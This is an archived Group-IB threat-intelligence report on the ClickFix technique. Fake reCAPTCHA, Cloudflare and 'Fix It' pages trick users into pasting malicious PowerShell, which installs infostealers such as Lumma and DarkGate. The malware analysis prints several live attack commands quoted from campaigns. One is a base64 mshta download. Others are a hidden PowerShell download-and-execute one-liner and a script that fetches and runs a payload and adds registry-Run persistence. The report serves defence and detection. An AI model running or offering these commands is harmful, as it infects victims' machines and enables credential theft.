{
	"id": "42090076-25d9-47b6-879e-c716e15e6237",
	"created_at": "2026-05-05T02:45:20.579691Z",
	"updated_at": "2026-05-05T02:46:36.742553Z",
	"deleted_at": null,
	"sha1_hash": "81e679651910fcbd740f2571d11cb51ad7878686",
	"title": "ClickFix: The Social Engineering Technique Hackers Use to Manipulate Victims",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 7491535,
	"plain_text": "ClickFix: The Social Engineering Technique Hackers Use to Manipulate\r\nVictims\r\nArchived: 2026-05-05 02:15:17 UTC\r\nIntroduction\r\nSince August 2024, the Group-IB Threat Intelligence (TI) team has researched and actively monitored the ClickFix\r\ntechnique in the wild. This technique has gained significant traction and widespread adoption among threat actors due to its\r\nsurprising effectiveness. It is tracked by cybersecurity researchers and firms under the names ClickFix and ClearFix.\r\nThe TI team at Group-IB has analyzed various infection chains and variants of this technique, as well as the different\r\noperations that have employed it. Based on our analysis, we have developed detection signatures for identifying ClickFix\r\nwebsites in the wild. Our systems continue to detect and track numerous instances of these sites, with thousands being\r\nalready added to our database at the time of compiling this report.\r\nAt its core, the ClickFix infection chain operates by deceiving users into taking an action to “fix” a non-existent issue by\r\neither automatically or manually copying and pasting a malicious command into their terminal or Run dialog. Pop-ups are\r\nshown with dialog requiring the user to press on buttons like “Fix It” or “I am not a robot”, as just a couple of examples\r\nobserved. Once clicked, a malicious powershell script is automatically copied to the user’s clipboard. Users are then\r\ndeceived into pasting the script into the RUN dialog after pressing Windows key + R, thereby executing the malware\r\nwithout their knowledge. This technique facilitates the infection process, enabling attackers to deploy the malware with\r\ndirect help of users.\r\nWhen users click the button on these webpages, a malicious PowerShell script is copied to their clipboard, and additional\r\ninstructions are displayed to prompt execution. The website uses JavaScript to automatically copy the script without any\r\nuser interaction.\r\nNotably, the method capitalizes on human behavior: by presenting a plausible “solution” to a perceived problem, attackers\r\nshift the burden of execution onto the user, effectively sidestepping many automated defenses.\r\nThis technique has been adopted by many cybercriminals, and even APT groups to lure their victims and infect them with\r\ntheir desired malware.\r\nThis blog post explores the ClickFix technique within the infostealer ecosystem, showcasing real-world examples. We will\r\nhighlight an incident detected by Group-IB MXDR before the technique became public and provide examples of APT\r\ngroups using ClickFix as well. Additionally, we will offer recommendations for mitigating this threat for organizations and\r\nindividuals.\r\nKey discoveries in the blog\r\nClickFix is a social engineering technique that tricks users into executing malicious PowerShell commands which are\r\nautomatically copied to their clipboard.\r\nFirst observed in October 2023, with significant global adoption by late 2024.\r\nFake reCAPTCHA pages and bot protection prompts are the most common disguises.\r\nLumma is the most frequently distributed infostealer in the analyzed campaigns.\r\nNation-state-sponsored APT groups also adopted this technique due to its effectiveness.\r\nClickFix and the Infostealer Ecosystem\r\nUnderstanding the mechanisms behind malware distribution is essential for identifying and disrupting potential threats\r\nbefore they even happen. The ClickFix technique has emerged as a vector for delivering infostealer malware in late 2024.\r\nThis section will explore how threat actors use ClickFix to compromise their victims.\r\nInfostealer malware is designed to exfiltrate sensitive data from compromised devices. This includes a wide variety of\r\ninformation such as usernames, passwords, cookies, cryptocurrency wallet information, and other confidential documents.\r\nInfostealers as any other type of malware can be distributed through a variety of means, but the ClickFix technique has\r\nrecently become one of the most popular methods used to trick the victims into installing it.\r\nHow the ClickFix trick works: ClickFix is a social engineering technique that involves tricking the victim into believing\r\nthat a legitimate action is required to proceed. This often manifests as an “Update”, “Fix”, or “Bot verification” prompt that\r\nhttps://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/\r\nPage 1 of 22\n\nappears when a user interacts with the site. The victim follows the instructions in the prompt which is basically to open the\r\nwindows RUN dialog and press Ctrl+V which will paste clipboard contents and cause malicious code to be executed on\r\ntheir machine. As a result, malware payload is delivered, and the victim’s machine is compromised.\r\nFigure 1. ClickFix malware infection chain.\r\nWe’ve observed that the majority of campaigns aim to deliver infostealers, which, once installed, collect sensitive\r\ninformation from the victim’s system and send it back to the attacker behind the operation.\r\nKey methods employed by threat actors to generate leads to ClickFix pages:\r\nDuring the analysis of ClickFix killchains in the wild, the following methods were observed:\r\n1. Spearphishing and Social Engineering: Threat actors use spearphishing emails or messages (via chat apps or SMS)\r\nto lure users into clicking on malicious links. This can be done both in an opportunistic manner, or by engaging with\r\ntargets directly with a tailored social engineering scheme.\r\n2. Malicious Advertising (Malvertising): Ads on legitimate websites are often hijacked to display malicious popups or\r\nredirect users to phishing sites.\r\n3. Phishing Websites (SEO poisoning): Malicious sites that mimic legitimate services (e.g., video streaming or tools)\r\ncan be SEO-optimized to appear high in search results, attracting unsuspecting visitors.\r\n4. Compromised Legitimate Websites: Threat actors exploit vulnerable or poorly secured websites to inject malicious\r\nplugins or code into them, which will impact the visitors of such sites.\r\n5. Social Media Spam: Threat actors engage in spamming forums, social media platforms, or comments sections to\r\npromote fake opportunities that lead to malware.\r\nOnce victims land on the malicious page by any of the above methods, the ClickFix technique will be used to trick them into\r\nexecuting the malicious payload which is usually an infostealing malware.\r\nFigure 2. Malware lifecycle utilizing ClickFix for delivery.\r\nAn Early Incident Detected by GROUP-IB MXDR\r\nhttps://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/\r\nPage 2 of 22\n\nOverview\r\nIn August 2024 GROUP-IB Incident Response team detected a technique being utilized on a campaign targeting Windows\r\nsystems. It employs websites to present fake reCAPTCHA forms to deceive users into executing a chain of obfuscated\r\nPowershell Commands which leads to a final downloader deploying Lumma C2 info-stealer (See Figure 3). GROUP-IB\r\nnamed this final downloader SMOKESABER.\r\nFigure 3. Overall chain of execution of the detected incident.\r\nIncident Details\r\nInitial Access\r\nThe attacker starts by constructing a malicious URL belonging to a hijacked domain that points the user to a fake\r\nreCAPTCHA page (See Figure 4). Once the user clicks on “I’m not a robot button” the embedded script in the HTML page\r\ncommands the browser to copy a malicious PowerShell command to the user clipboard. Then a popup instructs the user to\r\nopen Windows Run Dialogue Box and paste the malicious command to execute it (See Figure 5).\r\nFigure 4. Fake reCAPTCHA page.\r\nhttps://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/\r\nPage 3 of 22\n\nFigure 5. Popup instructing the victim to run the malicious command.\r\nThe base64 encoded PowerShell command downloads a portable executable that includes an HTA application that runs an\r\nobfuscated javascript loader.\r\nEncoded\r\npowershell.exe -eC\r\nbQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AZwBlAHQAeQBvAHUAcgBwAGEAZwBlAHMALgBjAG8AbQAvAGQ\r\nDecoded Powershell.exe -eC mshta “https://getyourpages.com/downloads/brv”\r\nJavascript Loader\r\nFollowing the initial access PowerShell command, utilizing “C:\\Windows\\System32\\mshta.exe” to execute the javascript\r\nembedded in the HTA application (See Figure 6).\r\nFigure 6. First stage of the Javascript loader.\r\nThe file that is given to mshta utility is a Windows binary, having JS scripts appended as the overlay. Without the overlay\r\nappended, the file is a clean Windows binary. The mshta utility finds the \u003cscript\u003e tags within a file and executes the\r\nembedded script, ignoring the binary portion of the file. This enables attackers to embed malicious scripts alongside binary\r\ncontent of the clean executable file, facilitating undetected execution of the script through mshta.\r\nThe script initiates by mapping decimal-encoded ASCII values to variables with randomized names. It subsequently\r\nemploys the String.fromCharCode() function to transform those encoded values back into their corresponding ASCII\r\ncharacters, unraveling the second stage of the JavaScript loader (See Figure 7). Analysis of the second stage shows that the\r\nvariables such as hch and JKk contained obfuscated data decoded by hsH function. The script leveraged the decoded\r\nvariable JKk which resolves into Wscript.shell, to create a new ActiveXObject. This object grants the script system-level\r\nprivileges to execute the encoded command stored in hch which resolves into SMOKESABER the final Powershell\r\nDownloader (See Figure 8).\r\nhttps://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/\r\nPage 4 of 22\n\nFigure 7. Second stage of the Javascript loader.\r\nFigure 8. SMOKESABER.\r\nSMOKESABER\r\nSMOKESABER employs various techniques to stay stealthy and deliver the final payload. It executes in a hidden window (-\r\nw 1) and bypasses execution policies (-ep Unrestricted). And the URL for the payload download is obfuscated using an array\r\nof numeric values, which are passed to the Yju() function. This function subtracts 11 from each numeric value and converts\r\nit to its corresponding ASCII character to reveal the actual URL. SMOKESABER also checks for a file named bravo.zip if\r\nit exists in %TEMP% and if not the script decodes the remote URL hosting this file and downloads it via (Web.Client\r\nhxxps://getyourpages[.]com/downloads/bravo[.]zip) and store it in %TEMP% to uncompress it and execute the first file in\r\nthe folder which is the executable containing the info-stealer (See Figure 9).\r\nFigure 9. Deobfuscated SMOKESABER.\r\nNote: GROUP-IB used the following to decode the Javascript loader and SMOKESABER.\r\nhttps://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/\r\nPage 5 of 22\n\nJavascript Loader Stage 1\r\nJavascript Loader Stage 2\r\nSMOKESABER\r\nFinal Stealer\r\nThe final payload delivered in bravo.zip was identified by GROUP-IB as LummaC2 Info-Stealer, It’s delivered alongside\r\nthe DLLs needed for the malware (See Figure 10). LummaC2 is a stealer malware written in C programming language\r\nwhich has been being sold as Malware-as-a-Service on Russian underground forums by the threat actor Shamel since\r\nDecember 2022. LummaC2 mainly targets cryptocurrency and 2FA extensions in data from Chromium and Mozilla-based\r\nbrowsers.\r\nFigure 10. Contents of bravo.zip.\r\nUpon analysis of the LummaC2 in Group-IB Malware Detonation Platform (MDP), it was shown that LummaC2 executable\r\n0tagscan.exe is injecting into BitLockerToGo.exe which communicates with the info-stealer C2 infrastructure.\r\nHighlights from the wild\r\nThe first detection of this technique was around 19-10-2023, back then it was not as mature as the current variations, but it\r\nwas likely the start of the evolution of this technique (see figure 12). Disguised as cloudflare anti-bot protection, it lured\r\nvictims into copying and executing the code to prove that they are not robots.\r\nFigure 12. Screenshot of a very early variant of ClickFix technique.\r\nFast forward to late 2024, we’ve observed an increase in the number of domains hosting clickfix pages since it became\r\npopular in August 2024, below figure illustrates an increasing trend of pages with clickfix content in from August 2024 to\r\nmid February 2025.\r\nhttps://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/\r\nPage 6 of 22\n\nFigure 13 Chart showcasing the growing trend of clickfix pages.\r\nThis growing trend suggests that the technique is gaining popularity due to its effectiveness in deceiving users and helping\r\nthreat actors to achieve their objectives. And it is expected to be seen more frequently in the wild.\r\nThis rising prevalence of ClickFix pages in the wild underscores the growing threat posed by this technique. Therefore it\r\nbecomes increasingly important to implement effective methods for detecting and mitigating such threats. To keep pace with\r\nthese evolving threats, we’ve developed hunting rules for ClickFix pages for tracking their spread across the threat\r\nlandscape.\r\nHunting ClickFix Pages\r\nGROUP-IB hunting strategy employs a multi-layered approach focused on identifying new domains hosting ClickFix\r\ncontent and analyzing the associated kill chains. This process combines automated tools with manual techniques to detect\r\npatterns characteristic of ClickFix pages, such as unique strings, page source components, domain names, JavaScript\r\nfunctions, and hashes of loaded content (e.g., scripts, images, etc.). Our hunting rules and internal tools have already\r\ndetected thousands of ClickFix pages in the wild, with numbers continuing to rise. This enables us to provide fresh IOCs and\r\nsupport organizations in strengthening their proactive defenses.\r\nNow, let’s explore a simple way how analysts can hunt for HTML pages hosting the ClickFix variant developed by a\r\nsecurity researcher for educational purposes, the source code is available on GitHub. By inspecting the page source\r\n(index.html), we can identify several key strings, including:\r\n“reCAPTCHA Verification ID” – This captures the reCAPTCHA element.\r\n“document.execCommand(“copy”)” – This captures the automatic copy-to-clipboard functionality.\r\nUsing just these two strings, we can run a query on URLScan.io to get a list of ClickFix pages:\r\nFigure 14 query results from URLScan\r\nEach variant in the wild has its own properties and unique strings in the page source, or it may load a specific image file or\r\nscript, these can be used to build a similar query and find the malicious pages or to monitor for their appearance in real time.\r\nhttps://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/\r\nPage 7 of 22\n\nNext, we will take a closer look at some of the most common ClickFix variants observed in the wild. These variants differ in\r\nstyle and implementation but have many similarities at their core.\r\nThe fake reCAPTCHA\r\nThis variant closely mirrors the look and functionality of the legitimate Google reCAPTCHA, making it highly convincing\r\nto internet users. Its familiarity encourages unsuspecting victims to engage with the page, believing it to be part of a standard\r\nsecurity check.\r\nBelow are some varying styles for it as detected in the wild:\r\nhttps://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/\r\nPage 8 of 22\n\nFigure 15. Variants of the fake reCAPTCHA.\r\nImpersonating social media sites\r\nFigure 16. Impersonating social media sites\r\nCloudflare bot protection on deceptive sites\r\nhttps://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/\r\nPage 9 of 22\n\nAnother variation of the ClickFix technique is Cloudflare bot protection. Several phishing sites have been identified that\r\nimitate well-known brand sites, only to redirect users to a ClickFix page. Examples are shown below:\r\nhttps://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/\r\nPage 10 of 22\n\nFigure 17. Examples of fake Cloudflare bot protection.\r\nThese ClickFix pages closely resembles the authentic Cloudflare page, but when the user attempts to verify, it appears as\r\nfollows:\r\nFigure 18. Example of a secondary prompt for users to fix their browser.\r\nAnd when “Fix It” button is clicked, malicious code is coped to user’s clipboard, and the next page shows:\r\nhttps://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/\r\nPage 11 of 22\n\nFigure 19. Example of a follow-up prompt for users to copy the malicious code to their clipboard.\r\nSome other styles:\r\nFigure 20. Another example of a follow-up prompt for users to copy the malicious code to their clipboard.\r\nProblems with the Browser\r\nPop-ups claiming there are issues with the browser that require the user to take specific actions in order to resolve the\r\nproblem and continue browsing normally.\r\nhttps://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/\r\nPage 12 of 22\n\nFigure 21. Pop-ups that require users to take specific actions to resolve their browser issues.\r\nImpersonating cryptocurrency trading sites\r\nFigure 22. Example of similar pop-ups on phishing sites impersonating cryptocurrency trading sites.\r\nImpersonating various brands\r\nhttps://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/\r\nPage 13 of 22\n\nhttps://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/\r\nPage 14 of 22\n\nFigure 22. Example of similar pop-ups on phishing sites impersonating the websites of popular brands.\r\nAll of them work in a similar manner, upon clicking on the “I’m not a robot” or “Fix it” or “Copy Fix” the malicious code is\r\nautomatically copied to the clipboard and instructions are shown to paste it into the RUN dialog.\r\nThe possibilities are endless, and the technique continues to evolve, finding innovative ways to deceive users. As threat\r\nactors refine their methods, we can expect even more sophisticated variants to emerge.\r\nLet’s now explore how threat actors have weaponized ClickFix and the distribution methods they use to lead victims to these\r\nmalicious pages.\r\nAPT Groups using the fake reCAPTCHA\r\nNation-state sponsored APT groups have incorporated ClickFix into their toolkit. GROUP-IB has attributed a campaign with\r\nmoderate confidence to MuddyWater. The group is suspected of launching a campaign targeting Armenian organizations by\r\ncreating a phishing site that mimicked an Armenian police website (hxxps[://]police-am[.]info/news/view/galstanyan151026[.]html). They sent deceptive emails to victims, ultimately delivering a remote\r\nmanagement tool (RMM) that granted attackers full access to the compromised systems. A screenshot of the website is\r\nincluded below.\r\nFigure 23. Examples of translated content for specific countries and regions.\r\nhttps://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/\r\nPage 15 of 22\n\nAs shown in the images above, the original variant was translated into the language of the targeted victims, highlighting how\r\nClickFix variants are evolving and being tailored for specific audiences.\r\nAs highlighted in our annual High-Tech Crime Trends Report 2025, APT28 also used this tactic against the Ukrainian\r\ngovernment as reported by Ukrainian CERT. Below image illustrates the killchain from the phishing email to the reverse\r\nshell.\r\nFigure 23. Killchain from phishing email to reverse shell by CERT-UA.\r\nMalvertising\r\nAmong the ways of spreading ClickFix in the wild was malvertising. We observed many seemingly innocuous sites that\r\noffer content like movies, free games, cracked software, video downloaders, etc.. containing malicious ads which at some\r\npoint started redirecting users to ClickFix pages or showing popups that upon clicking opens a ClickFix page.\r\nBelow figure shows user browsing history and how the user was redirected to the ClickFix page after visiting a site for\r\ndownloading youtube videos:\r\nFigure 24. Browser history and redirection.\r\nThe following is the malicious powershell script that is copied to user clipboard on that page:\r\npowershell.exe -W Hidden -command $url =\r\n'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest\r\n-Uri $url -UseBasicParsing; $text = $response.Content; iex $text\r\nhttps://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/\r\nPage 16 of 22\n\nThis script downloads another powershell script from https://finalstepgo.com/uploads/il2.txt:\r\n$DC9otj0V='https://finalstepgo.com/uploads/il222.zip';\r\n$Oo9IGFrX=$env:APPDATA+'\\OIlqJYuE';\r\n$jRAYnWOS=$env:APPDATA+'\\yANrdNKT.zip';\r\n$BtdSGfci=$Oo9IGFrX+'\\PrivacyDrive.exe'; if (-not (teST-PatH $Oo9IGFrX))\r\n{ new-itEM -Path $Oo9IGFrX -ItemType Directory }; STart-biTSTrANSFeR\r\n-Source $DC9otj0V -Destination $jRAYnWOS;\r\nExPAnD-aRcHIVE -Path $jRAYnWOS -DestinationPath $Oo9IGFrX -Force; remOvE-ITem $jRAYnWOS; StarT-ProCESS\r\n$BtdSGfci; NEw-itemPrOPeRtY -Path\r\n'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name 'RATU0Beb'\r\n-Value $BtdSGfci -PropertyType 'String';\r\nThis eventually downloads and executes the below file, which is actually the Lumma Infostealer (SHA1:\r\n03ac191b235b3a867539720070a5e6ca1108b4f2):\r\nWe’ve identified other sites with similar behavior, what all these sites have in common is that they provide illegal\r\nvideo/movies downloading/streaming services. They were used as distribution infrastructure through the popups that appear\r\non them. Some of these sites are:\r\n*.savefrom.net\r\nunblocked.watch\r\nmp3fromlink.com\r\nhisotv.com\r\nwww.portalmovies.com.ar\r\nsfrom.net\r\ntagalogdubbed.com\r\nwww.youtubepp.com\r\nssyoutube.com\r\nwww.y2mate.com\r\nMulticanais.love\r\nAnother example from browser history showing redirects from a free movies site to many clickfix pages having titles such\r\nas “..Loading..”, “Security Check”, “Verify You Are Human”:\r\nhttps://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/\r\nPage 17 of 22\n\nFigure 24. Browser history after visiting a website with malicious ads redirecting to ClickFix pages.\r\nThis website, like many others, generates revenue through an ad network, where more ad redirects lead to higher earnings,\r\nthe visitor of these sites is forcibly redirected to these sites by making hidden buttons on the page or mapping the Back Page\r\nbutton to the trigger. The ad network delivers malicious ads containing ClickFix content, and the advertisers behind these\r\nads do not filter content, allowing anything to be advertised. These advertisers typically operate on illegitimate websites that\r\nhost pirated or free content. The source of the ads on this particular page was\r\nhxxps[://]nx[.]oribichitra[.]com/rBJF1ZzvNtU/LrNQV. Using Ad Blockers can provide good protection against these ad\r\npopups and redirects.\r\nSpamming forums and social media with links to ClickFix\r\nAnother distribution method used by threat actors is spamming forums or social media with links to ClickFix pages, in the\r\nexample below the threat actor posted on a gaming forum about a crack for a new popular game:\r\nhttps://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/\r\nPage 18 of 22\n\nFigure 25. Example of a post of a crack for a popular new game that leads to a ClickFix phishing page.\r\nSo, when users search the Internet for free or cracked versions of video games or software, they may encounter online\r\nforums, community posts, or public repositories with links that redirect them to ClickFix pages.\r\nPhishing emails\r\nAnother campaign that went viral targeted github users where a threat actor creates a “github issue” with phishing content\r\nclaiming that the repository has vulnerabilities, as shown in the below image:\r\nGithub then sends an email notification with the content of the issue to repository contributors, example email:\r\nhttps://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/\r\nPage 19 of 22\n\nWhen the user opens the phishing link, the ClickFix page is displayed.\r\nSpearphishing emails with HTML attachments\r\nIn the example below the threat actor sent a spearphishing email with HTML attachment which was actually a ClickFix\r\npage:\r\nOpening the attachment shows the ClickFix page:\r\nInjected content into clipboard:\r\nhttps://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/\r\nPage 20 of 22\n\nNoting that in the RUN dialog, only the first line is visible which is (ipconfig /flushdns) which makes it look harmless.\r\nFinal payload that is executed:\r\nThe final payload in this campaign was DarkGate malware.\r\nConclusion\r\nThe ClickFix technique marks an evolution in adversarial social engineering strategies, leveraging user trust and browser\r\nfunctionality for malware deployment. The rapid adoption of this method by both cybercriminals and APT groups\r\nunderscores its effectiveness and low technical barrier. By exploiting common workflows, such as interacting with\r\nCAPTCHAs or copying commands, these attacks have demonstrated a capability to bypass traditional defenses.\r\nOrganizations must adapt to this evolving threat by incorporating technical defenses such as PowerShell restrictions and\r\nclipboard activity monitoring while prioritizing user education. These measures, when combined, can significantly diminish\r\nthe risk posed by such attacks. As the landscape continues to evolve, proactive measures and vigilance are essential to\r\nmitigate the impacts of these innovative attack vectors.\r\nFor individuals, caution is equally important. Avoiding untrusted websites and prompts, using only reliable sources for\r\ndownloads, and steering clear of unnecessary scripts or extensions can mitigate exposure to these threats. Staying informed\r\nabout cyber threats and verifying actions before execution are essential practices to enhance personal security and\r\neffectively complement broader technical defenses.\r\nRecommendations\r\nFor prevention:\r\nUsers should verify URLs in emails, especially from unknown or unexpected sources.\r\nUsers should avoid downloading cracked software, illegal material or visiting suspicious websites.\r\nUsers should not click on links from suspicious sources.\r\nUsers should adopt strong password practices: change passwords regularly, use unique and robust passwords for each\r\nonline account, and include a combination of uppercase and lowercase letters, numbers, and symbols. And use 2FA\r\nwhen it is supported.\r\nUsers should not store or save passwords in web browsers, clear text files, windows credential managers. Use\r\npassword managers instead.\r\nOrganizations should implement advanced endpoint detection and response (EDR) solutions that use behavior-based\r\ndetection techniques to identify and block malicious activities. Ensure AV and/or EDR perform sandboxing of the\r\nexecutable files downloaded from the internet.\r\nOrganizations should implement MFA for accessing sensitive systems and data.\r\nOrganizations should conduct regular training sessions to educate users about social engineering tactics and new\r\nphishing schemes.\r\nOrganizations should implement robust email filtering to block phishing emails and malicious attachments.\r\nOrganizations should apply a strict software execution policy to prevent users from downloading malware disguised\r\nas fake software installers.\r\nOrganization should implement application whitelisting solutions to allow only legitimate applications or scripts to\r\nrun via the mshta.exe process.\r\nhttps://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/\r\nPage 21 of 22\n\nOrganizations should deploy Group Policy to enforce the firewall rule across all endpoints to prevent outbound\r\nconnection over 443 or 80 ports established by the mshta.exe process (Ensure that no legitimate business processes\r\nrely on mshta.exe to make network connections over port 443/80).\r\nOrganizations should block IOCs shared by threat intelligence service providers.\r\nIf prevention was not successful, a compromise often leads to the collection and exfiltration of sensitive information from\r\nthe infected host. In such case, our recommendations are:\r\nImmediately isolate the infected machine and disconnect it from the internet.\r\nReset all passwords, session cookies, and block credit cards, etc.. assuming all sensitive data on the host, including\r\nfiles, has been compromised.\r\nEngage a DFIR team to assess the breach and conduct any necessary incident response activities.\r\nSource: https://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/\r\nhttps://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/\r\nPage 22 of 22",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/"
	],
	"report_names": [
		"clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims"
	],
	"threat_actors": [],
	"ts_created_at": 1777949120,
	"ts_updated_at": 1777949196,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/81e679651910fcbd740f2571d11cb51ad7878686.pdf",
		"text": "https://archive.orkl.eu/81e679651910fcbd740f2571d11cb51ad7878686.txt",
		"img": "https://archive.orkl.eu/81e679651910fcbd740f2571d11cb51ad7878686.jpg"
	}
}